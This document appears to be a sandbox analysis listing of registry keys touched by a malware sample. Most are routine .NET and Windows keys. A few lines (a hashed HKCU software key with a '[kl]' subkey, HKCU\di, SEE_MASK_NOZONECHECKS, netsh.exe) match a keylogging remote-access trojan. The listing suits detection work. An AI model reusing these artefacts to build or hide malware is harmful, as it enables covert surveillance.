HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_CURRENT_USER\di
HKEY_CURRENT_USER\Environment
HKEY_CURRENT_USER\Environment\SEE_MASK_NOZONECHECKS
HKEY_CURRENT_USER\Software\3e2ba6e27f6c302ca8093546541e02ce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Windows|Microsoft.NET|Framework|v2.0.50727|RegAsm.exe.Config
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Windows|Microsoft.NET|Framework|v2.0.50727|RegAsm.exe.Config
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Windows|Microsoft.NET|Framework|v2.0.50727|RegAsm.exe.Config
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgJITDebugLaunchSetting
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgManagedDebugger
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\InstallationType
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Library
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\IsMultiInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\First Counter
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\CategoryOptions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\FileMappingSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Counter Names
HKEY_CURRENT_USER\Software\3e2ba6e27f6c302ca8093546541e02ce\[kl]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\CurrentBuildNumber
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TCPIP6\Parameters\DisabledComponents
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\iphlpsvc\Config
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\iphlpsvc\config\Connectivity_Platform_Enabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7\Name
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\StringCacheSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4b\7F06864B
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\LanguageList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\p2pcollab.dll,-8042
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NapAgent\LocalConfig
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups\
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enable Tracing
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Tracing Level
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Friendly Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\dhcpqec.dll,-100
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Description
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\dhcpqec.dll,-101
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Version
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\dhcpqec.dll,-103
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Vendor Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\dhcpqec.dll,-102
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Info Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Config Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Validator Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Registration Date
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Component Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Friendly Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\napipsec.dll,-1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Description
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\napipsec.dll,-2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Version
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\napipsec.dll,-4
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Vendor Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\napipsec.dll,-3
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Info Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Config Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Validator Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Registration Date
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Component Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Friendly Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\tsgqec.dll,-100
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Description
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\tsgqec.dll,-101
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Version
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\tsgqec.dll,-102
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Vendor Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\tsgqec.dll,-103
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Info Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Config Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Validator Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Registration Date
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Component Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Friendly Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\eapqec.dll,-100
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Description
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\eapqec.dll,-101
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Version
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\eapqec.dll,-102
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Vendor Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\eapqec.dll,-103
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Info Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Config Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Validator Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Registration Date
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Component Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Qecs\79617
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\PlumbIpsecPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Qecs\79619
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Qecs\79621
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Qecs\79623
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\netsh.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\F6C4EC9A
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\PeerDist
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\PolicyProvider
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Diagnostics
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\PeerDist
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\Service
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Service
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Service\Enable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Service\PolicyRefreshInProgress
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\DownloadManager
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DownloadManager
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DownloadManager\TransportDllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DownloadManager\CryptoAlgo
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\DownloadManager\Protocol
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DownloadManager\Protocol
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\DownloadManager\Download
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DownloadManager\Download
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\DownloadManager\Discovery
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DownloadManager\Discovery
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\DownloadManager\Upload
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DownloadManager\Upload
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\DownloadManager\UtilityIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DownloadManager\UtilityIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\DownloadManager\Peers\Connection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DownloadManager\Peers\Connection
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\SecurityManager
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\SecurityManager
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\SecurityManager\BlockSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\SecurityManager\NumBlocksPerSegment
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\SecurityManager\Restricted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\SecurityManager\Restricted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\SecurityManager\Restricted\Seed
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\CacheMgr\Republication
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\CacheMgr\Republication
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\CacheMgr\Publication
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\CacheMgr\Publication
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\HandleMgr
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HandleMgr
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\HostedCache\Connection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\Connection
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\HostedCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\ServerRole
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\ClientAuth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\TransportDllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\MaxSimultaneousDownloads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\MaxSimultaneousUploads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\MaxPendingOffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\MaxPendingDownloads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\DoNotUseSSL
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\CooperativeCaching
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\CooperativeCaching
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\DiscoveryManager
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DiscoveryManager
